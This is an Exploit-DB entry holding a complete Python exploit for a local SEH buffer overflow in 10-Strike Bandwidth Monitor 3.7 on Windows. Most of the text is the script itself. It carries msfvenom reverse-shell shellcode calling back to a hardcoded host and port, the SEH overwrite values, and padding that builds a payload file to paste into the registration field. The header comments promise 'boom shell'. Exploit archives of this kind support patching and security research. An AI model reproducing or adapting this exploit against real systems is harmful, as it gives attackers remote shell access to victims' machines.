10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)

EDB-ID:

45085

CVE:

N/A

Author:

absolomb

Type:

local

Platform:

Windows

Published:

2018-07-25

# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml
# Run script, open up generated txt file and copy to clipboard
# Open Bandwith Monitor, Enter my key, Paste code from clipboard, hit OK, boom shell.
# Or from inside the app you can go to the Help tab, click Registration and Paste code from clipboard, hit OK, boom shell. 

#!/usr/bin/python

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -b '\x00\x0a\x0d' -f python -v shellcode
shellcode =  ""
shellcode += "\xbb\x03\xe2\x9b\xb7\xda\xc3\xd9\x74\x24\xf4\x5e"
shellcode += "\x29\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\x5d"
shellcode += "\xec\x79\x42\x9d\x18\xff\xad\x5d\xd9\x60\x27\xb8"
shellcode += "\xe8\xa0\x53\xc9\x5b\x11\x17\x9f\x57\xda\x75\x0b"
shellcode += "\xe3\xae\x51\x3c\x44\x04\x84\x73\x55\x35\xf4\x12"
shellcode += "\xd5\x44\x29\xf4\xe4\x86\x3c\xf5\x21\xfa\xcd\xa7"
shellcode += "\xfa\x70\x63\x57\x8e\xcd\xb8\xdc\xdc\xc0\xb8\x01"
shellcode += "\x94\xe3\xe9\x94\xae\xbd\x29\x17\x62\xb6\x63\x0f"
shellcode += "\x67\xf3\x3a\xa4\x53\x8f\xbc\x6c\xaa\x70\x12\x51"
shellcode += "\x02\x83\x6a\x96\xa5\x7c\x19\xee\xd5\x01\x1a\x35"
shellcode += "\xa7\xdd\xaf\xad\x0f\x95\x08\x09\xb1\x7a\xce\xda"
shellcode += "\xbd\x37\x84\x84\xa1\xc6\x49\xbf\xde\x43\x6c\x6f"
shellcode += "\x57\x17\x4b\xab\x33\xc3\xf2\xea\x99\xa2\x0b\xec"
shellcode += "\x41\x1a\xae\x67\x6f\x4f\xc3\x2a\xf8\xbc\xee\xd4"
shellcode += "\xf8\xaa\x79\xa7\xca\x75\xd2\x2f\x67\xfd\xfc\xa8"
shellcode += "\x88\xd4\xb9\x26\x77\xd7\xb9\x6f\xbc\x83\xe9\x07"
shellcode += "\x15\xac\x61\xd7\x9a\x79\x25\x87\x34\xd2\x86\x77"
shellcode += "\xf5\x82\x6e\x9d\xfa\xfd\x8f\x9e\xd0\x95\x3a\x65"
shellcode += "\xb3\x59\x12\x4a\xc3\x32\x61\x94\xc2\x79\xec\x72"
shellcode += "\xae\x6d\xb9\x2d\x47\x17\xe0\xa5\xf6\xd8\x3e\xc0"
shellcode += "\x39\x52\xcd\x35\xf7\x93\xb8\x25\x60\x54\xf7\x17"
shellcode += "\x27\x6b\x2d\x3f\xab\xfe\xaa\xbf\xa2\xe2\x64\xe8"
shellcode += "\xe3\xd5\x7c\x7c\x1e\x4f\xd7\x62\xe3\x09\x10\x26"
shellcode += "\x38\xea\x9f\xa7\xcd\x56\x84\xb7\x0b\x56\x80\xe3"
shellcode += "\xc3\x01\x5e\x5d\xa2\xfb\x10\x37\x7c\x57\xfb\xdf"
shellcode += "\xf9\x9b\x3c\x99\x05\xf6\xca\x45\xb7\xaf\x8a\x7a"
shellcode += "\x78\x38\x1b\x03\x64\xd8\xe4\xde\x2c\xe8\xae\x42"
shellcode += "\x04\x61\x77\x17\x14\xec\x88\xc2\x5b\x09\x0b\xe6"
shellcode += "\x23\xee\x13\x83\x26\xaa\x93\x78\x5b\xa3\x71\x7e"
shellcode += "\xc8\xc4\x53"

# JMP always true
nseh = '\x71\x06\x70\x04'

# 0x01174647 POP POP RET BandMonitor.exe
seh = '\x47\x46\x17\x01'

payload = '\x41' * 4188
payload += nseh
payload += seh
payload += shellcode
payload += '\x41' * (1804 - len(shellcode))

file = open('sploit.txt','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(payload)
file.close()
print "TXT file created!"